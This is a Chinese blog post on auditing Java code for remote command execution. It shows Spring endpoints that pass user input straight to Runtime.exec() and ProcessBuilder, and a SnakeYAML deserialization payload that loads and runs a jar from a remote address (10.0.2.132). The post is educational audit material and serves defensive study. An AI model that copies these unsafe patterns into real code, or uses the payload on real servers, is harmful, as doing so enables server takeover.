java审计-RCE审计

最新推荐文章于 2024-05-17 11:32:18 发布
最新推荐文章于 2024-05-17 11:32:18 发布
阅读量473 收藏
点赞数
文章标签: java 开发语言 服务器 系统安全 代码复审
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/admin741admin/article/details/129738971
版权

RCE 漏洞的定义及原理

  • RCE 的中文名称是远程命令执行,指的是攻击者通过Web 端或客户端提交执行命令,由于服务器端没有针对执行函数做过滤或服务端存在逻辑漏洞,导致在没有指定绝对路径的情况下就可以执行命令。

  • RCE 漏洞的原理其实也很简单,就是通过开发人员没有针对代码中可执行的特殊函数或自定义方法入口做过滤,导致客户端可以提交恶意构造语句,并交由服务器端执行。常见的可执行函数如:Runtime.exec(),当然我们审计的时候,决不能只根据这个函数来,其他的审计点如:Process、ProcessBuilder.start()等也是很重要的内容。

Runtime

@GetMapping("/runtime/exec")
public String CommandExec(String cmd) {
    Runtime run = Runtime.getRuntime();
    StringBuilder sb = new StringBuilder();

    try {
        Process p = run.exec(cmd);
        BufferedInputStream in = new BufferedInputStream(p.getInputStream());
        BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
        String tmpStr;

        while ((tmpStr = inBr.readLine()) != null) {
            sb.append(tmpStr);
        }

        if (p.waitFor() != 0) {
            if (p.exitValue() == 1)
                return "Command exec failed!!";
        }

        inBr.close();
        in.close();
    } catch (Exception e) {
        return e.toString();
    }
    return sb.toString();
}

在这里插入图片描述

ProcessBuilder

  • ProcessBuilder传入参数为列表,第一个参数为可执行命令程序,后面的参数为执行的命令程序的参数。

     @GetMapping("/ProcessBuilder")
 public String processBuilder(String cmd) {

     StringBuilder sb = new StringBuilder();

     try {
        // String[] arrCmd = {"/bin/sh", "-c", cmd};  //linux
         String[] arrCmd = {cmd};                 //windows,windos下无需指定
         ProcessBuilder processBuilder = new ProcessBuilder(arrCmd);
         Process p = processBuilder.start();
         BufferedInputStream in = new BufferedInputStream(p.getInputStream());
         BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
         String tmpStr;

         while ((tmpStr = inBr.readLine()) != null) {
             sb.append(tmpStr);
         }
     } catch (Exception e) {
         return e.toString();
     }

     return sb.toString();
 }

    在这里插入图片描述

jscmd

  • 传入的参数为一个JavaScript代码的url地址
    在这里插入图片描述

    在这里插入图片描述

yml

  • YAML(YAML Ain’t Markup Language),也可以叫做YML,是一种人性化的数据序列化的语言,类似于XML,JSON。SpringBoot的配置文件就支持yaml文件

  • 利用SnakeYAML存在的反序列化漏洞来rce,在解析恶意 yml 内容时会完成指定的动作。

  • https://github.com/artsploit/yaml-payload

http://localhost:8080/rce/vuln/yarm?content=!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.0.2.132/yaml-payload.jar"]
  ]]
]

在这里插入图片描述

在这里插入图片描述

zgcadmin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java代码审计】RCE篇
大河之犬的博客
12-21 1423
命令注入(RCE)是指在某种开发需求中,需要引入对系统本地命令的支持来完成某些特定的功能。当未对可控输入的参数进行严格的过滤时,则有可能发生命令注入。攻击者可以使用命令注入来执行系统终端命令,直接接管服务器的控制权限。
Java命令注入_java代码审计 命令注入 及 修复建议
weixin_29374899的博客
02-12 1159
命令注入:是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。在Web应用中,有时候会用到一些命令执行的函数,如php中system、exec、shell_exec等,当对用户输入的命令没有进行限制或者过滤不严导致用户可以执行任意命令时,就会造成命令执行漏洞。命令注入漏洞主要表现为以下两种形式:1、攻击者能够算改程序执行的命令:攻击者直接控制了所执行的命令。2、攻击者能够复改命...
JAVA-不安全的反射--RCE
最新发布
weixin_48421613的博客
05-17 767
JAVA不安全的反射造成的RCE小案例
Java - Fastjson之RCE攻击模拟(远程代码执行漏洞)
Zong_0915的博客
12-03 1497
Java - Fastjson之RCE问题分析及攻击模拟(远程代码执行漏洞)Fastjson出现RCE问题的必要前提分析 首先,本文的Fastjson相关的RCE问题,针对于版本在1.2.24以下的。 Fastjson出现RCE问题的必要前提分析
Java代码审计15之Apache log4j2漏洞
划水的小白白
08-31 1312
1、log4j简介 2、复现 2.1、高版本测试 2.2、测试代码 2.3、补充之dns探测 2.3.1、rmi、ldap也可以dnslog探测 2.3.2、dnslog外带信息 3、漏洞原理 3.1、漏洞的危害大的背景 3.2、具体的代码调试 4、靶场测试 4.1、dns探测 4.2、工具下载与使用 4.3、测试 4.4、手工可以测出,部分扫描器扫不到 5、bypass
RCE漏洞详解及绕过总结(全面)
热门推荐
永不落的梦想
07-10 1万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
RCE绕过的简介以及常见的绕过方式(个人学习笔记)
2302_80935968的博客
03-28 923
1.目录分隔符被过滤后,无法通过cat等查看目录的命令直接读取文件夹的目录里的PHP文件,而是需要先进入该文件夹(查看文件夹目录),再通过cat读取PHP文件的内容。进入题目,查看源代码,为php函数,该函数意思为:判断是否有变量cmd,如果有,则执行eval($_REQUEST[‘cmd’]);查看网页信息,该题对注入的命令无任何过滤,且当输入ip的时候,cmd会执行ping命令,尝试ping 127.0.0.1 | ls ,可以正常连接。命令 system():执行系统命令并输出执行结果。
nacos-hessian-rce.pdf
04-22
4. **定期审计与监控**: 定期对应用程序进行安全审计,并监控网络流量,及时发现异常行为。 ### 总结 `nacos-hessian-rce.md` 文件中详细描述了一个关于 Nacos 中 Hessian 使用不当导致的 RCE 漏洞。该漏洞的存在...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
总的来说,Fastjson的RCE漏洞是Java开发者和系统管理员必须关注的重要安全问题。通过深入理解漏洞原理,采取合适的预防措施,可以大大降低被攻击的风险。同时,开源社区提供的"fastjson-rce-exploit-master"等资源,...
第57天:代码审计-JAVA项目框架类漏洞分析报告1
08-03
然而,由于其灵活性,OGNL也存在安全风险,如XSS(跨站脚本)和RCE(远程代码执行)漏洞,因此在进行代码审计时,对OGNL表达式的使用和安全控制必须给予高度关注。 另一方面,Spring Expression Language(SpEL)是...
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
2. **Javaweb-Struts2框架类RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求,攻击者可以执行任意Java代码。 3. **一句话Webshell后门**:这是一种简单的Web后门,仅用一行代码即可...
non_RCE
03-12
2. **Java安全模型**:Java通过其安全模型来防止RCE,如类加载器机制、安全策略(Policy)、访问控制(Access Control)和沙箱模型。理解这些机制对于编写安全的Java代码至关重要。 3. **输入验证和过滤**:有效的...
代码审计之越权及越权
无心的博客
09-28 1150
在一般的测试中,越权是比较简单的一种漏洞,但又是类型比较多的一种,因为他可能存在在各种参数中,它的情况还是比较多的,这里仅仅之说一种,而且这里我写的也仅仅是其中的一种可能情况。 以下所有代码都是我自己写的,可能有不美观,代码错误等等问题,希望大家可以指正。 漏洞讲解 先登陆账户一,查看当前的内容 退出,登陆账户二 两个账户的内容是不一样的 点击编辑,进入编辑页面 此时更改url中的id值,即...
Java代码审计rce漏洞
m0_55772907的博客
11-15 824
代码审计
java越权_从Java的角度简单修复Cookie越权漏洞
weixin_33268205的博客
02-12 1689
技术实在是有限,讲解cookie越权的时候可能有点简单和粗糙。这里就简单记录学习下。首先自己写一段存在漏洞的代码code:sendCookie.javapackagecookie;importjava.io.IOException;importjavax.servlet.ServletException;importjavax.servlet.http.Cookie;importjavax.ser...
代码审计JAVA代码审计洞态IAST系统以及SecExample靶场
weixin_52515588的博客
04-21 6314
目录 2 JAVA系列代码审计 2.1 工具介绍 2.2 SecExample靶场安装 2.3 洞态IAST安装 2.3 洞态IAST使用 2 JAVA系列代码审计 之前我们都是采用代码审计工具对PHP代码进行审计,但是在实际的工作中对于从事代码审计的人员来说JAVA的代码审计也是必不可少的,那么接下来我会详细介绍一下JAVA代码审计的流程,供大家参考学习。 2.1 工具介绍 在接下来的操作中,我主要是利用洞态IAST以及Secexample靶场来完成对JAVA..
java代码审计初试——newbee-mall审计
m0_46317063的博客
07-04 531
java代码审计初试——newbee-mall审计
Java代码审计怎么做?
半夏_2021的博客
05-08 3087
Java代码审计怎么做?
java防止横向越权得方法_横向越权纵向越权安全漏洞的解决
weixin_36086687的博客
02-27 2915
一.什么是横向越权和纵向越权.1.横向越权:攻击者想访问与他权限相同的用户,例如:在忘记密码回答问题成功后,会跳到重设密码的页面,这个时候如果用户随意填用户名和密码,而且数据库也刚刚好存在这个用户时,那么就会修改其他用户的密码,这就是横向越权2.纵向越权:低级别攻击者想访问高级别用户的资源。二.怎么解决1.横向越权:在回答问题时,成功的时候,会在服务端根据用户名生成一个token(随机数和用户名的...
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行(RCE)漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞出现在ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行正则表达式匹配。攻击者可以通过在请求中注入恶意的代码来执行任意的PHP代码。这个漏洞在ThinkPHP框架的Dispatcher类中的102行被触发。\[2\]\[3\] 为了修复这个漏洞,建议升级到最新版本的ThinkPHP框架,或者手动修复代码中的漏洞。具体修复方法包括使用更安全的正则表达式替代preg_replace函数,并且避免使用/e模式进行正则表达式匹配。此外,还应该对用户输入进行严格的过滤和验证,以防止恶意代码的注入。 #### 引用[.reference_title] - *1* [【漏洞复现】[ThinkPHP]2-Rce](https://blog.csdn.net/Mr_atopos/article/details/124907676)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [ThinkPHP2-RCE漏洞复现](https://blog.csdn.net/qq_51459600/article/details/125179451)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值